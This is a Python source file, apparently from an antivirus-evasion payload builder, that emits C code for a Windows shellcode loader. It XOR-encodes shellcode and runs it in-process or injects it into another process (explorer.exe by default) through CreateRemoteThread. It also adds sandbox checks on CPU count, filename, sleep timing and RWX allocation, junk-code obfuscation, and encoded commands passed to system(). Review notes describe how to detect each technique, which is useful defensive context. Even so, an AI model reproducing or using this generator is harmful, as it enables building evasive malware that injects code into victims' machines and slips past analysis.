def local_thread_injection(vShellcode, decoder_stub, junkcode, intensity):
    """Return C source text that runs a decoded buffer inside the current process.

    The returned string is ``decoder_stub`` followed by three emitted C
    statements: a ``VirtualAlloc`` call requesting ``PAGE_EXECUTE_READWRITE``
    memory, a ``memcpy`` of the buffer named by ``vShellcode`` into it, and a
    call through a ``void(*)()`` function pointer. A closing ``}`` is appended,
    so the enclosing C function is opened by a caller outside this view.

    Args:
        vShellcode: C identifier of the decoded byte array (a string).
        decoder_stub: C source text placed before the emitted statements.
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Review note (detection): the pointer name comes from
    ``core.varname_creator()`` (presumably randomised; defined outside this
    view), so identifier-based signatures will not match across builds. The
    API sequence and the RWX protection constant are fixed in the template,
    so behavioural rules on a private RWX allocation that is written and then
    executed are the stable observable.
    """
    # Name of the pointer that receives the allocation in the emitted C code.
    execs = core.varname_creator()
    lti = decoder_stub
    # junk.junk_inject(..., "code", ...) returns text that is interleaved
    # between the fixed statements; its content is defined outside this view.
    lti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: allocation with PAGE_EXECUTE_READWRITE, sized by `sizeof <buffer>`.
    lti += "\nvoid *" + execs + " = VirtualAlloc(0, sizeof " + vShellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
    lti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: copy of the decoded buffer into the new region.
    lti += "memcpy(" + execs + ", " + vShellcode + ", sizeof " + vShellcode + ");\n"
    lti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: control transfer into the copied bytes via a function-pointer cast.
    lti += "((void(*)())" + execs + ")();\n"
    # Closes a C block that is opened elsewhere.
    lti += "}\n"
    return lti
def mono_core(junkcode, intensity):
    """Return a generated C environment-check function and its call-site text.

    The emitted C function allocates 1000 bytes with ``VirtualAllocEx`` on
    ``GetCurrentProcess()`` using ``PAGE_EXECUTE_READWRITE``. If the pointer
    is non-NULL it prints a generated string; otherwise it calls ``exit(0)``.

    Args:
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        A 2-tuple ``(evasion_funcname, evasion_func)``: the prototype line after
        ``replace_string`` (defined outside this view; presumably it rewrites
        the prototype into a call statement, TODO confirm) and the full C
        function definition.

    Review note (detection): the check terminates the process when an RWX
    self-allocation fails, so a sample built from this template exits without
    further activity in environments that deny such allocations. The function
    and variable names are generated per build; the ``VirtualAllocEx``
    arguments are constant.
    """
    # Prototype line of the emitted C function; the name is generated.
    evasion_funcname = "void " + core.varname_creator() + "(void)\n"
    mem2 = core.varname_creator()
    evasion_func = evasion_funcname
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "LPVOID " + mem2 + "= NULL;\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: fixed-size (1000 byte) RWX allocation in the current process.
    evasion_func += mem2 + " = VirtualAllocEx(GetCurrentProcess(), NULL, 1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "if (" + mem2 + " != NULL)\n"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: prints a generated string on the success path.
    evasion_func += 'printf("' + core.varname_creator() + '");\n'
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += '}\n'
    evasion_func += "else\n"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: silent termination when the allocation failed.
    evasion_func += "exit(0);\n"
    evasion_func += "}\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n\n"
    evasion_funcname = replace_string(evasion_funcname)
    return evasion_funcname, evasion_func
def xor_encryption(shellcode, junkcode, intensity):
    """Return the decoded-buffer identifier and C text holding an XOR-encoded array.

    Byte values are extracted from ``shellcode`` with a regular expression,
    XORed against a repeating key, and written out as a C ``int`` array. The
    emitted C also declares the length, the key as a ``char`` array, the key
    length, and a loop that XORs the array back into an ``unsigned char``
    buffer at run time.

    Args:
        shellcode: Text containing escaped hex byte pairs.
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        A 2-tuple ``(vShellcode, final_stub)``: the generated identifier of the
        decoded buffer and the C source text.

    Review note (analysis): the key is built from ``choice(digits)``
    (presumably ``string.digits``; the import is outside this view) with a
    length from ``randrange(64, 128)``, and it is written in clear text into
    the same generated source as the encoded array. The encoding is therefore
    obfuscation only: both operands of the XOR are recoverable statically from
    the build output.
    """
    # Captured hex byte pairs; this name is reused below for the C text.
    final_stub = findall('\\\\x([a-f0-9][a-f0-9])', shellcode)
    shellcode_len = len(final_stub)
    # Key length is 64..127 characters (randrange excludes the upper bound).
    keylen = randrange(64, 128)
    password = ''.join(choice(digits) for i in range(keylen))
    vShellcode = core.varname_creator()
    vShellcodelen = core.varname_creator()
    vEshellcode = core.varname_creator()
    vPassword = core.varname_creator()
    vPasswordlen = core.varname_creator()
    # Variables
    # Each byte is XORed with the key character at the same index modulo the
    # key length and emitted as a decimal integer.
    final_stub = '\nint enc_shellcode[] = { ' + ', '.join([ str(int(code, 16) ^ ord(password[(i % len(password))])) for i, code in enumerate(final_stub) ]) + ' };\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    # Replaces the placeholder array name with the generated identifier; this
    # runs over everything accumulated so far, including the injected text.
    final_stub = final_stub.replace("enc_shellcode", vEshellcode)
    final_stub += 'int ' + vShellcodelen + f' = {shellcode_len};\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    # The key is embedded verbatim as a C string literal.
    final_stub += 'char ' + vPassword + f'[] = "{password}";\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    final_stub += 'int ' + vPasswordlen + f'= {len(password)};\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    # Decoder stub
    final_stub += "unsigned char " + vShellcode + "[" + vShellcodelen + "];\n"
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    final_stub += "for(int i = 0; i < " + vShellcodelen + "; i++) {\n"
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: run-time XOR of the encoded array with the repeating key.
    final_stub += vShellcode + "[i] = (char) " + vEshellcode + "[i] ^ " + vPassword + "[i % " + vPasswordlen + "];\n}\n"
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    return vShellcode, final_stub
def shuffle_funcname(top_funcname_code, junkcode, intensity):
    """Return the lines of ``top_funcname_code`` in random order, newline-terminated.

    Args:
        top_funcname_code: Multi-line text; split with ``splitlines()``.
        junkcode: When equal to ``"yes"``, injected text is added as well.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        The shuffled lines joined into one string.

    Review note (analysis): ``shuffle`` (presumably ``random.shuffle``; the
    import is outside this view) reorders the lines on every build, so the
    order of the generated call statements is not a stable feature for
    signatures.
    """
    top_funcname_code = top_funcname_code.splitlines()
    # In-place random reordering of the line list.
    shuffle(top_funcname_code)
    new_line = ""
    for line in top_funcname_code:
        line += "\n"
        new_line += line
        # NOTE(review): the nesting of this check under the loop is
        # reconstructed from a whitespace-collapsed listing; confirm against
        # the original file.
        if junkcode == "yes":
            new_line += junk.junk_inject(junkcode, "code", intensity)
    return new_line
def my_name_is(filename, junkcode, intensity):
    """Return a generated C file-name check function and its call-site text.

    The emitted C function receives a ``char *`` argument and calls
    ``exit(0)`` unless ``strstr`` finds the expected file name inside it. The
    call-site text passes ``argv[0]``.

    Args:
        filename: Output path; the ``output/`` prefix is stripped before the
            name is embedded in the C string literal.
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        A 2-tuple ``(evasion_funcname, evasion_func)``: the call-site text
        after ``replace_string`` (defined outside this view) and the full C
        function definition.

    Review note (analysis): a binary built from this template terminates
    immediately when it is executed under a different file name, which is
    what happens when a sandbox or triage pipeline renames a submission to its
    hash. The expected name is present as a plain string literal in the
    binary, so it can be read statically and restored before detonation.
    """
    evasion_funcname = "void " + core.varname_creator() + "(char *args)\n"
    b = core.varname_creator()
    # Only the bare file name is embedded, not the build output directory.
    filename = filename.replace('output/', '')
    evasion_func = evasion_funcname
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: substring test of the argument against the expected file name.
    evasion_func += 'if (strstr(args, "' + filename + '") > 0)\n'
    evasion_func += "{\n"
    # Emitted: a no-op declaration on the matching path.
    evasion_func += "int " + b + " = 0;\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n"
    evasion_func += "else"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: silent termination when the name does not match.
    evasion_func += "exit(0);\n"
    evasion_func += "}\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n\n"
    # The call site passes argv[0] in place of the parameter declaration.
    evasion_funcname = evasion_funcname.replace("(char *args)", "(argv[0])")
    evasion_funcname = replace_string(evasion_funcname)
    return evasion_funcname, evasion_func
def number_of_core(junkcode, intensity):
    """Return a generated C processor-count check function and its call-site text.

    The emitted C function calls ``GetSystemInfo``, reads
    ``dwNumberOfProcessors`` and calls ``exit(0)`` when the value is below 2.

    Args:
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        A 2-tuple ``(evasion_funcname, evasion_func)``: the prototype line
        after ``replace_string`` (defined outside this view) and the full C
        function definition.

    Review note (analysis): single-vCPU analysis machines cause a binary built
    from this template to exit before any further behaviour is observed.
    Detonation environments need at least two logical processors to get past
    this check.
    """
    evasion_funcname = "void " + core.varname_creator() + "(void)\n"
    sysguide = core.varname_creator()
    xcore = core.varname_creator()
    evasion_func = evasion_funcname
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "SYSTEM_INFO " + sysguide + ";\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: query of system information into the generated struct variable.
    evasion_func += "GetSystemInfo(&" + sysguide + ");\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "int " + xcore + " = " + sysguide + ".dwNumberOfProcessors;\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: threshold is fixed at 2 logical processors.
    evasion_func += "if (" + xcore + " < 2)\n"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "exit(0);\n"
    evasion_func += "}\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n\n"
    evasion_funcname = replace_string(evasion_funcname)
    return evasion_funcname, evasion_func
def exercise_room(injection_type, processname, vShellcode, decoder_stub, architecture, junkcode, intensity, evasions, decoys, windows_firewall, windows_update, filename):
    """Assemble the complete generated C source for the selected injection type.

    Collects the optional pieces (environment checks, injected filler
    functions, decoy code, post-execution stub) from sibling modules, builds
    the execution stub with ``local_thread_injection`` or
    ``remote_thread_injection``, and hands everything to ``body_builder``.

    Args:
        injection_type: ``"local"`` or ``"remote"``; any other value leaves the
            result empty.
        processname: Target process name for the remote case; an empty string
            selects ``"explorer.exe"``.
        vShellcode: C identifier of the decoded buffer.
        decoder_stub: C text that decodes the buffer.
        architecture: Forwarded to ``evasion.the_great_evasion``.
        junkcode: ``"yes"`` enables the injected filler function.
        intensity: Forwarded to the ``junk`` helpers.
        evasions: ``"yes"`` enables the environment-check function.
        decoys: Forwarded to ``decoy.fake_u``.
        windows_firewall: Forwarded to ``postexploit.hidden_forever``.
        windows_update: Forwarded to ``postexploit.hidden_forever``.
        filename: Forwarded to ``evasion.the_great_evasion``.

    Returns:
        The text returned by ``body_builder``, or ``""`` when
        ``injection_type`` is neither ``"local"`` nor ``"remote"``.

    Review note (analysis): ``evasion``, ``decoy``, ``postexploit`` and
    ``body_builder`` are defined outside this view, so their output is not
    described here. What this function fixes is the default remote target
    name, ``explorer.exe``, which is a useful pivot when reviewing
    cross-process access telemetry for builds that did not set a name.

    NOTE(review): the nesting of the branches is reconstructed from a
    whitespace-collapsed listing; confirm against the original file.
    """
    exec_code = ""
    evasion_code = ""
    junkfunc_code = ""
    top_funcname_code = ""
    # All optional components are generated up front, whether or not the
    # branches below end up using them.
    evasion_funcname, evasion_func = evasion.the_great_evasion( evasions, architecture, filename, junkcode, intensity)
    # In "func" mode junk_inject returns a (call-site, definition) pair.
    junkfuncname, junkcode_func = junk.junk_inject(junkcode, "func", intensity)
    decoy_code = decoy.fake_u(decoys, junkcode, intensity)
    xor_func, exec_stub = postexploit.hidden_forever(windows_firewall, windows_update, junkcode, intensity)
    final_code = ""
    if injection_type == "local":
        if junkcode == "yes":
            junkfunc_code += junkcode_func
            top_funcname_code += junkfuncname
            core.junkcode_added()
            core.junkfunc_added()
        if evasions == "yes":
            evasion_code += evasion_func
            top_funcname_code += evasion_funcname
            core.evasion_added()
        # In-process execution stub.
        exec_code += local_thread_injection(vShellcode, decoder_stub, junkcode, intensity)
        final_code += body_builder(evasion_code, junkfunc_code, top_funcname_code, exec_code, decoy_code, xor_func, exec_stub, junkcode, intensity)
    elif injection_type == "remote":
        if junkcode == "yes":
            junkfunc_code += junkcode_func
            top_funcname_code += junkfuncname
            core.junkcode_added()
            core.junkfunc_added()
        if evasions == "yes":
            evasion_code += evasion_func
            top_funcname_code += evasion_funcname
            core.evasion_added()
        if processname != "":
            exec_code += remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity)
            final_code += body_builder(evasion_code, junkfunc_code, top_funcname_code, exec_code, decoy_code, xor_func, exec_stub, junkcode, intensity)
        else:
            # No name supplied: the template falls back to a fixed target.
            processname = "explorer.exe"
            exec_code += remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity)
            final_code += body_builder(evasion_code, junkfunc_code, top_funcname_code, exec_code, decoy_code, xor_func, exec_stub, junkcode, intensity)
    return final_code
def remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity):
    """Return C source text that runs a decoded buffer inside another process.

    The returned string is ``decoder_stub`` followed by emitted C that takes a
    Toolhelp process snapshot, compares each entry's ``szExeFile`` with
    ``processname`` using ``stricmp``, and for a match calls ``OpenProcess``
    with ``PROCESS_ALL_ACCESS``, ``VirtualAllocEx`` with
    ``PAGE_EXECUTE_READWRITE``, ``WriteProcessMemory`` and
    ``CreateRemoteThread``. The final ``}`` closes a C block opened by a
    caller outside this view.

    Args:
        processname: Executable name embedded as a C string literal.
        vShellcode: C identifier of the decoded byte array.
        decoder_stub: C source text placed before the emitted statements.
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Review note (detection): every identifier is generated per build, but the
    API sequence and its constants are fixed in the template. The observable
    chain is a process enumeration, a handle opened with
    ``PROCESS_ALL_ACCESS`` to an unrelated process, an RWX allocation and
    write in that process, and a thread started at the allocated address.
    Sysmon ProcessAccess (event ID 10) and CreateRemoteThread (event ID 8)
    records cover the second and last steps. The target name is a plain
    string literal in the binary.
    """
    entry = core.varname_creator()
    snapshot = core.varname_creator()
    process_handle = core.varname_creator()
    remote_thread = core.varname_creator()
    remote_buffer = core.varname_creator()
    rti = decoder_stub
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "\nPROCESSENTRY32 " + entry + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += entry + ".dwSize = sizeof(PROCESSENTRY32);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: system-wide process snapshot.
    rti += "HANDLE " + snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "if (Process32First(" + snapshot + ", &" + entry + ") == TRUE)\n"
    rti += "{\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "while (Process32Next(" + snapshot + ", &" + entry + ") == TRUE)\n"
    rti += "{\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: case-insensitive comparison against the embedded process name.
    rti += 'if (stricmp(' + entry + '.szExeFile, ' + '"' + processname + '"' + ') == 0)'
    rti += '{\n'
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "HANDLE " + process_handle + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "HANDLE " + remote_thread + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "PVOID " + remote_buffer + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: full-access handle to the matched process.
    rti += process_handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + entry + ".th32ProcessID);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: RWX allocation in the other process.
    rti += remote_buffer + " = VirtualAllocEx(" + process_handle + ", NULL, sizeof " + vShellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: cross-process write of the decoded buffer.
    rti += "WriteProcessMemory(" + process_handle + ", " + remote_buffer + ", " + vShellcode + ", sizeof " + vShellcode + ", NULL);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: thread creation in the other process at the written address.
    rti += remote_thread + " = CreateRemoteThread(" + process_handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + remote_buffer + ", NULL, 0, NULL);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Closes the match block, the while loop and the Process32First block.
    rti += "CloseHandle(" + process_handle + ");}}}\n"
    rti += "CloseHandle(" + snapshot + ");"
    rti += "}\n"
    return rti
def encrypt_exec(commands, junkcode, intensity):
    """Return a generated C XOR-decoder function and C text that runs encoded commands.

    Each entry of ``commands`` is encoded with ``xor_encrypt`` (defined outside
    this view) under one random key. The emitted C declares the key and the
    encoded commands as ``int`` arrays, decodes each command into a ``char``
    buffer with the generated decoder function, and passes the result to
    ``system()``.

    Args:
        commands: Iterable of command strings; it is iterated and also passed
            to ``len()``.
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        A 2-tuple ``(func_stub, code)``: the C decoder function definition and
        the C text holding the tables and the decode-and-run loop.

    Review note (detection and analysis): the key (length from
    ``randrange(1024, 4096)``, characters from ``choice(digits)``) and the
    encoded commands are both embedded in the generated source, so the
    command strings are recoverable statically by XORing the two tables. At
    run time the decoded text is handed to ``system()``, which starts the
    command interpreter as a child process, so process-creation logging with
    command lines records each command in clear text regardless of the
    encoding.
    """
    # Decryptor
    func_name = core.varname_creator()
    arg_command = core.varname_creator()
    arg_key = core.varname_creator()
    arg_command_lenght = core.varname_creator()
    arg_key_lenght = core.varname_creator()
    arg_exec = core.varname_creator()
    i = core.varname_creator()
    # Emitted: decoder signature (encoded ints, key ints, both lengths, output buffer).
    func_stub = "void " + func_name + "(int " + arg_command + "[], int " + arg_key + "[], int " + arg_command_lenght + ", int " + arg_key_lenght + ", char " + arg_exec + "[])\n"
    func_stub += "{\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += "for(int " + i + " = 0; " + i + "< " + arg_command_lenght + "; " + i + "++)"
    func_stub += "{\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: element-wise XOR with the repeating key.
    func_stub += arg_exec + "[" + i + "] = " + arg_command + "[" + i + "] ^ " + arg_key + "[" + i + " % " + arg_key_lenght + "];\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += "}\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: NUL terminator so the output buffer is a C string.
    func_stub += arg_exec + "[" + arg_command_lenght + "] = 0;\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += "}\n"
    # One key of 1024..4095 characters is shared by all commands.
    keylen = randrange(1024, 4096)
    key = ''.join(choice(digits) for i in range(keylen))
    cmd = list()
    for command in commands:
        # xor_encrypt is defined outside this view; the code below treats its
        # result as a sized sequence whose str() form is a bracketed list.
        cmd.append(xor_encrypt(command, key))
    vKeylen = core.varname_creator()
    vKey = core.varname_creator()
    vNumcommands = core.varname_creator()
    vSizeofcommands = core.varname_creator()
    vMaxcommandsize = core.varname_creator()
    vCommands = core.varname_creator()
    vExeccommands = core.varname_creator()
    i = core.varname_creator()
    code = "int " + vKeylen + f" = {len(key)};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # The key is embedded as a table of character codes.
    code += "int " + vKey + f"[] = {{{str([ord(k) for k in key])[1:-1]}}};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "int " + vNumcommands + f" = {len(commands)};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "int " + vSizeofcommands + f"[] = {{{', '.join([str(len(data)) for data in cmd])}}};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # Row width of the 2-D command table; max() raises ValueError when
    # `commands` is empty.
    max_length = max([len(data) for data in cmd])
    code += "int " + vMaxcommandsize + f" = {max_length};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "int " + vCommands + f"[][{max_length}] = {{{', '.join(['{' + str(cmds)[1:-1] + '}' for cmds in cmd])}}};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # Output buffers: one per command, each one byte longer than the widest row.
    code += "char " + vExeccommands + "[" + vNumcommands + "][" + vMaxcommandsize + " + 1];\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "for(int " + i + " = 0; " + i + " < " + vNumcommands + "; " + i + "++)\n"
    code += "{\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += func_name + "(" + vCommands + "[" + i + "], " + vKey + ", " + vSizeofcommands + "[" + i + "], " + vKeylen + ", " + vExeccommands + "[" + i + "]);\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # Emitted: each decoded command is executed through system().
    code += "system(" + vExeccommands + "[" + i + "]);"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "}\n"
    return func_stub, code
def fake_u(value, junkcode, intensity):
    """Return C text for ``value`` repetitions of a memory-and-timing check.

    Each repetition emits C that allocates a large heap buffer of random size
    (30,000,000 to 330,000,000 bytes), zero-fills it when the allocation
    succeeded, measures ``GetTickCount()`` around a ``Sleep(1000)`` call,
    calls ``exit(0)`` when fewer than 1000 ticks elapsed, and frees the
    buffer.

    Args:
        value: Repetition count as a string; ``""`` disables the feature.
        junkcode: Passed through to ``junk.junk_inject``.
        intensity: Passed through to ``junk.junk_inject``.

    Returns:
        The generated C text, or ``""`` when ``value`` is the empty string.

    Review note (analysis): the timing comparison makes a binary built from
    this template exit in environments that shorten ``Sleep`` without keeping
    the tick counter consistent. Each repetition also costs about one second
    of wall-clock time and a large transient allocation, which is visible in
    a memory or timing profile of the process start.
    """
    number_of_decoy = value
    if number_of_decoy != "":
        transform_to_int = int(number_of_decoy)
        # The same name is reused as the loop counter from here on.
        number_of_decoy = 0
        decoy_code = ""
        while number_of_decoy != transform_to_int:
            number_of_decoy += 1
            memdmp1 = core.varname_creator()
            tac1 = core.varname_creator()
            tick1 = core.varname_creator()
            # Allocation size in bytes, chosen per repetition (bounds inclusive).
            memdmp1_value = str(random.randint(30000000, 330000000))
            decoy_code += "char * " + memdmp1 + "= NULL;\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += memdmp1 + " = (char *)malloc(" + memdmp1_value + ");\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "if (" + memdmp1 + " != NULL)\n"
            decoy_code += "{\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            # Emitted: zero-fill of the whole buffer.
            decoy_code += "memset(" + memdmp1 + ", 00, " + memdmp1_value + ");\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "}\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            # Emitted: tick count before and after a one-second sleep.
            decoy_code += "int " + tick1 + " = GetTickCount();\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "Sleep(1000);\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "int " + tac1 + " = GetTickCount();\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            # Emitted: exit when the measured interval is shorter than the sleep.
            decoy_code += "if ((" + tac1 + " - " + tick1 + ") < 1000)\n"
            decoy_code += "{\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "exit(0);\n"
            decoy_code += "}\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "free(" + memdmp1 + ");\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            # NOTE(review): whether this call sits inside the loop or after it
            # is reconstructed from a whitespace-collapsed listing; confirm
            # against the original file.
            core.decoy_added()
        return decoy_code
    elif number_of_decoy == "":
        return ""